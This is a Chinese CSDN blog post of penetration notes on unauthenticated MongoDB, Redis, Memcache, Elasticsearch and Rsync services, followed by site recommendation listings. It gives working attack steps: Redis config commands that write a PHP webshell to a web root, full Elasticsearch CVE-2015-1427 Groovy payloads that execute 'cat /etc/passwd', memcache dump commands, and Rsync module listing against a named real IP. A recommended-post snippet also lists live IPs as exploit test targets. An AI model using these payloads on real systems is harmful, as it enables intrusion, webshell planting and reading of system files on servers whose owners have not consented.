一些安全问题

最新推荐文章于 2022-02-27 20:26:42 发布
最新推荐文章于 2022-02-27 20:26:42 发布
阅读量581 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ytuo1223/article/details/45897671
版权

0x01   mongodb未授权访问

扫描服务器是否开启了端口27017,使用客户端直接连接

客户端下载   http://www.mongovue.com/downloads/ 


0x02 mongdb的REST接口,提供一个web界面访问,默认运行在28017端口上,扫描28017,可以直接通过浏览器访问

http://host:28017  这个借口的开启需要修改配置文件


0x03

redis没有加密方式,监听6379 tcp端口,默认redis如果没有指向监听内网地址,而对外开放,外网可以直接访问该数据库。

Redis安装
Linux版安装或下载:地址http://redis.io/download  
$ wget http://download.redis.io/releases/redis-2.8.19.tar.gz
$ tar xzf redis-2.8.19.tar.gz
$ cd redis-2.8.19
$ make

$ src/redis-server        //开启redis服务器即可

连接redis服务器

$src/redis-cli  -h ip

可以随时执行“save”命令将当前redis的数据保存到硬盘上

可以将dir设置为一个目录a,而dbfilename为文件名b,再执行save或bgsave,则我们就可以写入一个路径为a/b的任意文件:

config set dir  网站绝对路径 //需要先知道网站绝对路径

config set dbfilename shell.php

set webshell "<?php phpinfo();?>"

save

即写入shell


0x04

memcache 是一种分布式缓存服务器,和通常使用的非分布式的ecache不同,memcache需要独立的服务器支撑,客户端通过配置IP地址和端口号(默认11211)与之连接并使用API进行数据的缓存操作。

若服务器开启了11211端口,则可以使用telnet  ip 11211   或者是nc -vv ip 11211远程连接

连接后获取信息

stats items

stats cachedump <item: id> <返回结果数量,0代表返回全部>


0x05

elasticsearch安全问题

1.

elasticsearch在安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)

查看是否使用了river    ---->http://localhost:9200/_cat/indices里面的indices包含了_river一般就是了

查看river详细信息---------> http://localhost:9200/_river/search


2.

Elasticsearch Groovy 脚本动态执行漏洞分析和poc(CVE-2015-1427)

http://mp.weixin.qq.com/s?__biz=MjM5OTk2MTMxOQ==&mid=202983721&idx=1&sn=bde079dcee38c4c655e920cbcc78c6e8&scene=0  细节

exp利用

http://ip:9200/_search?pretty


POST数据

{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}

或者

{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream().readLines()","lang": "groovy"}}}

利用工具

https://github.com/Svti/ElasticSearchEXP/

3.

另一个  

Elasticsearch 代码执行漏洞利用工具

http://xxx.com:9200/_search?source=

详细:http://p2j.cn/?p=1300


0x06  Rsync安全

Rsync是一款远程同步软件安装后开放了端口873


找到开放873端口的服务器连接能否查看模块名:

rsync ip::

详细使用过程
http://drops.wooyun.org/papers/161 
http://wooyun.org/bugs/wooyun-2010-0107724

eg.
首先 root@kali:~# rsync 211.144.132.46::      ------>查看所有的模块名

然后 rsync ip::模块名------->访问该模块下对应的文件

也可以猜解用户名面膜

0x07 

PHP FastCGI 的远程利用

转自

http://zone.wooyun.org/content/1060











ytuo1223
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安全常识
heibaikong6的博客
03-16 496
安全常识 什么是漏洞 安全漏洞是信息系统在生命周期的各个阶段(设计、实现、运维等过程)中产生的某类问题,这些问题会对系统的安全(机密性、完整性、可用性)产生影响。 漏洞与Bug并不等同,他们之间的关系基本可以描述为:大部分的Bug影响功能性,并不涉及安全性,也就不构成漏洞;大部分的漏洞来源于Bug,但并不是全部,他们之间只是有一个很大的交集。 什么是攻击 利用网络存在的漏洞和安全缺陷对网...
安全笔记】
FSZ111的博客
12-04 487
漏洞类型 **通用型漏洞:**第三方软件,应用,系统对应的漏洞。 如ECShop、Discuz、PHPCMS的SQL注入,XSS漏洞。开源软件,安全浏览器,手机应用,路由器,开发框架,甚至是某VPN系统某防火墙系统的漏洞。 举个例子:   学校的教务系统,确定cms类型。发现存在这个漏洞,复现一下并且发现其他学校也存在漏洞。有的话就是通用,把这些例子加上,就是一张证书。    **事件型漏洞:**即非通用型漏洞,主要是指互联网上应用的一个具体漏洞,xx网站命令执行可被渗透,xx电商订单泄漏任意充值,xx网站
Elasticsearch Groovy任意命令执行漏洞EXP
Jiajia2017的博客
03-06 313
感谢:@lupin的分析(Elasticsearch Groovy 脚本动态执行漏洞分析和poc(CVE-2015-1427))本exp不一定正确,测试的站太少了,大家去测试测试。测试url:http://190.196.67.252:9200/_search?prettyhttp://191.234.18.14:9200///_search?pretty{"size":1,"...
ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427) (附exp)
xiaomin1991222的专栏
10-16 1118
ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远...
前端常见安全问题
NJR10byh的博客
02-27 4677
以下是对一些常见的前端安全问题的总结 一、iframe 1、防止自己的网站不被其他网站的 iframe 引用 // 检测当前网站是否被第三方iframe引用 // 若相等证明没有被第三方引用,若不等证明被第三方引用。当发现被引用时强制跳转百度。 if(top.location != self.location){ top.location.href = 'http://www.baidu.com' } 2、禁用被使用的 iframe 对当前网站某些操作 在HTML5中,iframe有了一个叫做sa
Android权限机制带来的一些安全问题介绍
09-03
然而,如同所有技术措施一样,Android的权限机制并非无懈可击,存在一些安全问题和潜在的漏洞。 首先,Android权限机制的一个显著缺陷是应用程序可以自由定义新的权限,无需遵循特定的命名规则。这种自由度可能导致...
过程行业中一些安全问题的回顾.pdf
10-16
过程行业中一些安全问题的回顾pdf,过程行业中一些安全问题的回顾
php解决安全问题的方法实例
10-16
在探讨PHP解决安全问题的方法时,首先我们要了解PHP的安全模式。它是PHP内嵌的一个安全机制,可以在一定程度上控制PHP中的函数操作,例如禁止使用system()函数,对文件操作函数进行权限控制等。默认情况下,安全模式...
servlet线程安全问题
03-14
Servlet 线程安全问题 Servlet 线程安全问题是指在使用 Servlet 编程时,如果不注意多线程安全问题,可能会导致难以发现的错误。Servlet/JSP 技术由于其多线程运行而具有很高的执行效率,但这也意味着需要非常...
2022年全国地级市人口分布数据(全新整理)
08-15
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/140877988 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用,经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理 ## 数据指标说明 资源名称:2022年全国地级市人口分布数据 区域范围:全国地级市 数据格式:.shp格式 数据规模:大于2G 数据来源:https://landscan.ornl.gov/
基于SSM++jsp的共享客栈管理系统
08-15
内容概要 共享客栈管理系统基于SSM(Spring、Spring MVC、MyBatis)框架和JSP技术开发,旨在为共享经济模式下的客栈经营者提供高效、便捷的信息管理工具。该系统集成了客栈房间管理、预订管理、入住与退房管理、账单管理以及客户信息管理等核心功能,帮助经营者全面掌控客栈的运营情况。系统支持实时更新客栈的房间状态,并能自动生成统计报表,方便经营者分析运营数据,提升管理效率。同时,系统具备多用户角色管理功能,支持不同权限的用户进行相应的操作,从而保障数据的安全性。 适用人群 本系统主要面向共享客栈经营者、房东、民宿管理公司以及IT技术人员。对于经营者和房东,系统提供了全方位的客栈管理功能,可以有效减少手工管理的工作量,提高运营效率。民宿管理公司可以利用该系统管理旗下多个客栈的日常运营情况,实现集中化管理。而IT技术人员则可以根据系统的架构,进行定制开发,满足特定客栈的个性化需求。此外,该系统也适用于需要系统化管理住宿资源的其他类似小型住宿业者。 使用场景及目标 该系统适用于多种场景,包括客栈日常的房间预订与管理、客户信息记录、账单生成及分析等。在实际使用中,经营者可以通过
JSP-个性化点餐配送系统(源码+数据库+论文).rar
最新发布
08-15
互联网系统平台的广泛应用,改变了人们生活方式的同时也优化提升了人们的生活质量,利用线上系统平台可以实现更加便捷高效的信息获取及在线操作,线上点餐系统的不断普及,让人们体验到了足不出户的点餐服务,利用线上平台信息互通的便捷性实现了商家、客户以及配送员的三方信息互通,借助点餐系统平台可以实现菜品订单信息的添加、在线下单及支付操作以及订单配送员调配。随着餐饮行业的竞争日益激烈,线下的经营模式已经无法满足很多餐厅的经营需求,借助线上系统平台不仅能够拓宽经营渠道同时也为传统的餐饮门店吸引了更多潜在客户。 结合当前餐饮行业的发展现状,本文借助SSM框架实现了点餐配送系统平台的搭建,结合主要用户角色客户、商家、配送员以及系统管理员的功能需求,通过JSP技术的应用实现了前后端的信息共享和动态页面内容呈现,借助点餐配送系统的开发实现了菜品信息管理、客户订单管理、商家配送管理等功能模块的运行,通过点餐配送系统平台的搭建实现了从菜品管理到终端配送的一系列服务内容,结合网络在线订餐系统的发展趋势,优化提升力了点餐的效率及满足更多用户的用餐需求。 关键词:SSM框架;JSP技术;MySQL数据库;点餐配送
YOLO 目标检测图像数据集:施工电缆缺陷检测
08-15
YOLO 目标检测图像数据集:施工电缆缺陷检测【包含训练集、验证集、对应标签、class文件】 数据集被处理成yolo格式,可以用于YOLO所有系列的网络训练。show脚本可以用于可视化数据,即将box目标绘制在图像上 类别个数(2):break等等【具体类别参考class类别文本文件】超过1000张数据和标签文件
自动打磨机(STP)_机械3D图可修改打包下载.zip
08-15
自动打磨机(STP)_机械3D图可修改打包下载.zip
原生JavaScript写的贪吃蛇游戏项目.zip
08-15
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全栈开发),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无积分,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于收集和整理资料耗费时间的酬劳
automagica-0.0.1-py3-none-any.whl.zip
08-15
automagica-0.0.1-py3-none-any.whl.zip
【轨迹跟踪】基于matlab MPC Segway式机器人平台轨迹跟踪(含角度 输出)【含Matlab源码 7218期】.mp4
08-15
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
FPGA的Verilog语法的基础学习笔记
08-15
学习FPGA的Verilog语法的过程中的笔记,希望对大家有所帮助
utf-8有中文无法解析或乱码提供了一个将读取的内容从utf-8转换为GBK的方法,通过MultiByteToWideChar
08-15
utf-8格式XML时出现乱码的问题,提供了一个将读取的内容从utf-8转换为GBK的方法,通过MultiByteToWideChar函数进行Unicode和GBK之间的转换,从而解决乱码显示问题。 使用Windows API‌ 在Windows平台上,‌可以通过调用MultiByteToWideChar和WideCharToMultiByte函数进行UTF-8与GBK之间的转换。‌这种方法适用于Windows环境下的编程3。‌
iframe安全问题
12-28
然而,iframe也存在一些安全问题。 首先,使用iframe可能会导致跨站点脚本攻击(XSS)。这意味着攻击者可以在iframe中嵌入恶意代码,然后诱使用户访问该页面,从而窃取用户的信息或执行恶意操作。 其次,iframe也...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值